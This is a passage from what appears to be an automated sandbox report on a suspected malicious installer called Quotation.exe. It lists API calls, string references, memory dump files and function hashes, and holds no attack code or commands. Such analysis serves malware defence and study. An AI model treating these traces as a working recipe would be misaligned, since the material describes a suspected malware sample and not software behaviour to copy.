                                                                                    • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 004063AB
                                                                                    • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000), ref: 004063DB
                                                                                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,00000000,007A4A88,00000000,-0000000A,00408984,00000000,[Rename],00000000,00000000,00000000), ref: 004063FB
                                                                                    • GlobalFree.KERNEL32(00000000), ref: 0040640D
                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00406414
                                                                                      • Part of subcall function 004068F9: GetFileAttributesW.KERNELBASE(?,0040340D,C:\Users\user\Desktop\Quotation.exe,80000000,00000003), ref: 004068FD
                                                                                      • Part of subcall function 004068F9: CreateFileW.KERNELBASE(?,?,?,00000000,?,00000000,00000000), ref: 0040691D
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1950641214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1950628419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950654842.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1952731849.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                                                    Similarity
                                                                                    • API ID: File$CloseGlobalHandleNamePathShort$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                                    • String ID: %ls=%ls$[Rename]
                                                                                    • API String ID: 2900126502-461813615
                                                                                    • Opcode ID: a2b202ff8827565348ba147a21b9a484a8522b83e041da5fa409378b6696546f
                                                                                    • Instruction ID: 9f7f24d6a9d8affb6c81019e1e78af230b3462d5c5472edf7d8bbe76e1c752c2
                                                                                    • Opcode Fuzzy Hash: a2b202ff8827565348ba147a21b9a484a8522b83e041da5fa409378b6696546f
                                                                                    • Instruction Fuzzy Hash: 1B3128B16012117BD7206B358D49F7B3A5CEF81749B06453EF943FA2C2DA7D88628A7C
                                                                                    APIs
                                                                                      • Part of subcall function 700212F8: GlobalAlloc.KERNELBASE(00000040,?,700211C4,-000000A0), ref: 70021302
                                                                                    • GlobalFree.KERNEL32(00000000), ref: 700222F1
                                                                                    • GlobalFree.KERNEL32(00000000), ref: 70022326
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1996808927.0000000070021000.00000020.00000001.01000000.00000006.sdmp, Offset: 70020000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1996786623.0000000070020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1996880927.0000000070024000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1996906021.0000000070026000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_70020000_Quotation.jbxd
                                                                                    Similarity
                                                                                    • API ID: Global$Free$Alloc
                                                                                    • String ID: s<u
                                                                                    • API String ID: 1780285237-779365171
                                                                                    • Opcode ID: 54c028372ca542150d9af4261a1c7bace912ce94e428229afaefccb9d4f8de71
                                                                                    • Instruction ID: 7f96d71bbdeb954ffcd8ab07b465d7aa119dc9fd293af1908d788f95d71b7297
                                                                                    • Opcode Fuzzy Hash: 54c028372ca542150d9af4261a1c7bace912ce94e428229afaefccb9d4f8de71
                                                                                    • Instruction Fuzzy Hash: 4531DE32100101FFE7268FA5ED84F6EB7BAFB45B32B300129F602D6161D7369999DB60
                                                                                    APIs
                                                                                    • CharNextW.USER32(?,*?|<>/":,00000000,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,00403C8F,C:\Users\user\AppData\Local\Temp\,76F93420,004039A0), ref: 00406D90
                                                                                    • CharNextW.USER32(?,?,?,00000000), ref: 00406D9F
                                                                                    • CharNextW.USER32(?,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,00403C8F,C:\Users\user\AppData\Local\Temp\,76F93420,004039A0), ref: 00406DA4
                                                                                    • CharPrevW.USER32(?,?,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,00403C8F,C:\Users\user\AppData\Local\Temp\,76F93420,004039A0), ref: 00406DBC
                                                                                    Strings
                                                                                    • Error writing temporary file. Make sure your temp folder is valid., xrefs: 00406D22
                                                                                    • C:\Users\user\AppData\Local\Temp\, xrefs: 00406D1B, 00406D1D
                                                                                    • *?|<>/":, xrefs: 00406D7F
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1950641214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1950628419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950654842.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1952731849.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                                                    Similarity
                                                                                    • API ID: Char$Next$Prev
                                                                                    • String ID: *?|<>/":$C:\Users\user\AppData\Local\Temp\$Error writing temporary file. Make sure your temp folder is valid.
                                                                                    • API String ID: 589700163-776222514
                                                                                    • Opcode ID: 5b032911993fa6072ca7f20f73d4f3d6e0cff76cb04f630808d27ad5f640f473
                                                                                    • Instruction ID: 64caea1e5fba35c947d9094266ac5fc002638ab42ea644ca00d5fa91912821bd
                                                                                    • Opcode Fuzzy Hash: 5b032911993fa6072ca7f20f73d4f3d6e0cff76cb04f630808d27ad5f640f473
                                                                                    • Instruction Fuzzy Hash: 7511D511B0063156DB30672A8C4097772E8DF69761756443BFDC6E32C0F77D8D9192B9
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1950641214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1950628419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950654842.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1952731849.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                                                    Similarity
                                                                                    • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                    • String ID:
                                                                                    • API String ID: 2320649405-0
                                                                                    • Opcode ID: bf0799ea3bd6f053e04a74c3ecacf9df28762d59f89d86d460fcd2570ffda868
                                                                                    • Instruction ID: 26ea8d1a65f0c358df8059d13c2b59527feb86654ff2728a298fdc5f00fd0ae6
                                                                                    • Opcode Fuzzy Hash: bf0799ea3bd6f053e04a74c3ecacf9df28762d59f89d86d460fcd2570ffda868
                                                                                    • Instruction Fuzzy Hash: E221D675500B049FDB649F28DA4895BB7F4EF45711B108A3EE896A26A0DB38E814DF28
                                                                                    APIs
                                                                                    • SetTimer.USER32(?,?,000000FA,00000000), ref: 0040364B
                                                                                    • MulDiv.KERNEL32(00124478,00000064,00124478), ref: 00403673
                                                                                    • wsprintfW.USER32 ref: 00403683
                                                                                    • SetWindowTextW.USER32(?,?), ref: 00403693
                                                                                    • SetDlgItemTextW.USER32(?,00000406,?), ref: 004036A5
                                                                                    Strings
                                                                                    • verifying installer: %d%%, xrefs: 0040367D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1950641214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1950628419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950654842.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1952731849.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                                                    Similarity
                                                                                    • API ID: Text$ItemTimerWindowwsprintf
                                                                                    • String ID: verifying installer: %d%%
                                                                                    • API String ID: 1451636040-82062127
                                                                                    • Opcode ID: 047d2cc0e248829387beeb5a8e07bbe74402e6ee51346e78a70c3337b09d8a04
                                                                                    • Instruction ID: 44471e5cb11ab05bb0c6ce4c76b363bdac3f6882ce80e8a3b6daee8e8afc751d
                                                                                    • Opcode Fuzzy Hash: 047d2cc0e248829387beeb5a8e07bbe74402e6ee51346e78a70c3337b09d8a04
                                                                                    • Instruction Fuzzy Hash: BE018F71540208BBDF20AF60DE45BAA3B28A700305F00803AF642B51E0DBB58554CF4C
                                                                                    APIs
                                                                                    • GlobalAlloc.KERNEL32(00000040,?), ref: 7002116B
                                                                                    • GlobalFree.KERNEL32(00000000), ref: 700211AE
                                                                                    • GlobalFree.KERNEL32(00000000), ref: 700211CD
                                                                                    • GlobalAlloc.KERNEL32(00000040,?), ref: 700211E6
                                                                                    • GlobalFree.KERNEL32 ref: 7002125C
                                                                                    • GlobalFree.KERNEL32(?), ref: 700212A7
                                                                                    • GlobalFree.KERNEL32(00000000), ref: 700212BF
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1996808927.0000000070021000.00000020.00000001.01000000.00000006.sdmp, Offset: 70020000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1996786623.0000000070020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1996880927.0000000070024000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1996906021.0000000070026000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_70020000_Quotation.jbxd
                                                                                    Similarity
                                                                                    • API ID: Global$Free$Alloc
                                                                                    • String ID:
                                                                                    • API String ID: 1780285237-0
                                                                                    • Opcode ID: c38fe23532219c782df549f43b99878dda0a68fc496c5926a130745c3691ef64
                                                                                    • Instruction ID: 5b1403470f0257959a54df1a4c9ae88cf6cabc081a387e62fd2c3738876a7451
                                                                                    • Opcode Fuzzy Hash: c38fe23532219c782df549f43b99878dda0a68fc496c5926a130745c3691ef64
                                                                                    • Instruction Fuzzy Hash: EA51BA72500201EFD710CF69EC80AAE77E9FB68B22B204569F94AD7361D731E915CB94
                                                                                    APIs
                                                                                    • wsprintfW.USER32 ref: 70021F51
                                                                                    • lstrcpyW.KERNEL32(?,error,00001018,70021765,00000000,?), ref: 70021F71
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1996808927.0000000070021000.00000020.00000001.01000000.00000006.sdmp, Offset: 70020000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1996786623.0000000070020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1996880927.0000000070024000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1996906021.0000000070026000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_70020000_Quotation.jbxd
                                                                                    Similarity
                                                                                    • API ID: lstrcpywsprintf
                                                                                    • String ID: callback%d$error$s<u
                                                                                    • API String ID: 2408954437-3671815815
                                                                                    • Opcode ID: 09f60fcdaa538e109d5f7ab750ad9f60791295f8b7e6f2f19593b33027f2557f
                                                                                    • Instruction ID: 135a1b4a07c3cd8661586b2a87fa0aaa5f964c3f1a4a3838a7a84e6bea79c879
                                                                                    • Opcode Fuzzy Hash: 09f60fcdaa538e109d5f7ab750ad9f60791295f8b7e6f2f19593b33027f2557f
                                                                                    • Instruction Fuzzy Hash: 45F08235204110AFD3048B04E988EBE73E6EF85721F1581A8FE5A97311C7B4AC818B91
                                                                                    APIs
                                                                                    • GlobalFree.KERNEL32(00000000), ref: 700221BF
                                                                                      • Part of subcall function 700212E1: lstrcpynW.KERNEL32(00000000,?,7002156A,?,700211C4,-000000A0), ref: 700212F1
                                                                                    • GlobalAlloc.KERNEL32(00000040), ref: 7002212C
                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 7002214C
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1996808927.0000000070021000.00000020.00000001.01000000.00000006.sdmp, Offset: 70020000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1996786623.0000000070020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1996880927.0000000070024000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1996906021.0000000070026000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_70020000_Quotation.jbxd
                                                                                    Similarity
                                                                                    • API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
                                                                                    • String ID:
                                                                                    • API String ID: 4216380887-0
                                                                                    • Opcode ID: 3562717f4ccf72c232665ad1fdddb6e26d2cd857cb373532633976aff65fbe33
                                                                                    • Instruction ID: 0e47fa6a3ecd932a8c4dca6a6a71c636e9e70f77f9a0cdd09bb70caca6802b83
                                                                                    • Opcode Fuzzy Hash: 3562717f4ccf72c232665ad1fdddb6e26d2cd857cb373532633976aff65fbe33
                                                                                    • Instruction Fuzzy Hash: 1841F371405205FFC3119FB4EC84FEE77B9FB04B62BA0023DFA499A14AD7706591DAA0
                                                                                    APIs
                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,00000808,00000000,70022B4C,00000000,00000808), ref: 70021F8C
                                                                                    • GlobalAlloc.KERNEL32(00000040,00000000), ref: 70021F97
                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 70021FAB
                                                                                    • GetProcAddress.KERNEL32(?,00000000), ref: 70021FB6
                                                                                    • GlobalFree.KERNEL32(00000000), ref: 70021FBF
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1996808927.0000000070021000.00000020.00000001.01000000.00000006.sdmp, Offset: 70020000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1996786623.0000000070020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1996880927.0000000070024000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1996906021.0000000070026000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_70020000_Quotation.jbxd
                                                                                    Similarity
                                                                                    • API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
                                                                                    • String ID:
                                                                                    • API String ID: 1148316912-0
                                                                                    • Opcode ID: 74514619470da0a281b810cb3f0625f6863a617b60f8bf6ab2b6db3637eb93a2
                                                                                    • Instruction ID: a9ccd60bc8da06d12fa9bee9aecf5722f79b79c07a23df437a98741ec2b70a29
                                                                                    • Opcode Fuzzy Hash: 74514619470da0a281b810cb3f0625f6863a617b60f8bf6ab2b6db3637eb93a2
                                                                                    • Instruction Fuzzy Hash: B0F0AC33108118BFD6101BA7DC4CE57BE6CEB8B6FAB260255FB19D11A1C5B268818771
                                                                                    APIs
                                                                                    • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403CA1,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,76F93420,004039A0), ref: 0040653A
                                                                                    • CharPrevW.USER32(?,00000000), ref: 00406545
                                                                                    • lstrcatW.KERNEL32(?,004082B0), ref: 00406557
                                                                                    Strings
                                                                                    • C:\Users\user\AppData\Local\Temp\, xrefs: 00406534
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1950641214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1950628419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950654842.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1952731849.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                                                    Similarity
                                                                                    • API ID: CharPrevlstrcatlstrlen
                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                    • API String ID: 2659869361-297319885
                                                                                    • Opcode ID: d05188d841616a9e1b7d59f18f8490afccaafd82e288364c4b54bb9922993767
                                                                                    • Instruction ID: 997ea4b4438496dccce44eacbb2634370b3c3ae0899ac86cf6792f2d8b8f87b4
                                                                                    • Opcode Fuzzy Hash: d05188d841616a9e1b7d59f18f8490afccaafd82e288364c4b54bb9922993767
                                                                                    • Instruction Fuzzy Hash: F7D05E31102924AFC2026B58AE08D9B77ACEF46341341406EFAC1B3160CB745D5287ED
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1996808927.0000000070021000.00000020.00000001.01000000.00000006.sdmp, Offset: 70020000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1996786623.0000000070020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1996880927.0000000070024000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1996906021.0000000070026000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_70020000_Quotation.jbxd
                                                                                    Similarity
                                                                                    • API ID: FreeGlobal$__alldvrm
                                                                                    • String ID:
                                                                                    • API String ID: 482422042-0
                                                                                    • Opcode ID: 31395a117a85d5f977612584bcb3da6e72a52fd76127e202fb0de92e166157dc
                                                                                    • Instruction ID: 1ec609fd4f0335b70da1f7339461fb1b0b4ee32efd86c70c828940593a58c829
                                                                                    • Opcode Fuzzy Hash: 31395a117a85d5f977612584bcb3da6e72a52fd76127e202fb0de92e166157dc
                                                                                    • Instruction Fuzzy Hash: 42510532608305CED7119E75BD805EEB6FBABE8E33B21492EF44383305E7A19D818291
                                                                                    APIs
                                                                                    • DestroyWindow.USER32(00000000), ref: 00403378
                                                                                    • GetTickCount.KERNEL32 ref: 00403397
                                                                                    • CreateDialogParamW.USER32(0000006F,00000000,0040362D,00000000), ref: 004033B6
                                                                                    • ShowWindow.USER32(00000000,00000005), ref: 004033C4
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1950641214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1950628419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950654842.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1952731849.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                    • String ID:
                                                                                    • API String ID: 2102729457-0
                                                                                    • Opcode ID: 357b023d8aff776a3d5515b2d6cdf3b091415c345a00606534bd97e45556d1c1
                                                                                    • Instruction ID: 5fb2c38a213eff1d2f515c73fe307429b33afba48c29838db2cc379488067e45
                                                                                    • Opcode Fuzzy Hash: 357b023d8aff776a3d5515b2d6cdf3b091415c345a00606534bd97e45556d1c1
                                                                                    • Instruction Fuzzy Hash: C9F0F870551700EBDB209F60EF8EB163AA8B740B02F505579F941B51F0DB788514CA5C
                                                                                    APIs
                                                                                    • OleInitialize.OLE32(00000000), ref: 00405852
                                                                                      • Part of subcall function 004054C6: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004054D8
                                                                                    • OleUninitialize.OLE32(00000404,00000000), ref: 0040589E
                                                                                      • Part of subcall function 00401399: MulDiv.KERNEL32(?,00007530,00000000), ref: 004013F9
                                                                                      • Part of subcall function 00401399: SendMessageW.USER32(?,00000402,00000000), ref: 00401409
                                                                                    Strings
                                                                                    • Fingersprogs Setup: Installing, xrefs: 00405842
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1950641214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1950628419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950654842.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1952731849.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                                                    Similarity
